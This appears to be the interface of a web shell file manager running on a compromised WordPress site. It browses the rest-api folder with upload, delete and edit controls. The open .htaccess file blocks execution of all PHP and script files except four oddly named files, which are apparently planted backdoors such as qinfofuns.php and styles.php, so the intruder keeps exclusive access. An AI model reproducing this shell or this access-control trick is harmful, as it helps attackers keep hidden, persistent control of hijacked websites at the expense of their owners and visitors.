golden hour
/home/godaofbq/hyperbarics4u.com/wp-includes/rest-api
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
514 B
Del
OK
class-wp-rest-request.php
25.9 KB
Del
OK
class-wp-rest-response.php
7.2 KB
Del
OK
class-wp-rest-server.php
56.62 KB
Del
OK
endpoints
-
Del
OK
fields
-
Del
OK
search
-
Del
OK
Edit: .htaccess
<FilesMatch "(?i)\.(py|exe|phtml|php\d*|suspected|cgi)$"> <IfModule mod_authz_core.c> Require all denied </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Deny from all </IfModule> </FilesMatch> <FilesMatch "^(site-maintenance\.php|qinfofuns\.php|wp-upgrade\.php|styles\.php)$"> <IfModule mod_authz_core.c> Require all granted </IfModule> <IfModule !mod_authz_core.c> Order allow,deny Allow from all </IfModule> </FilesMatch>
Save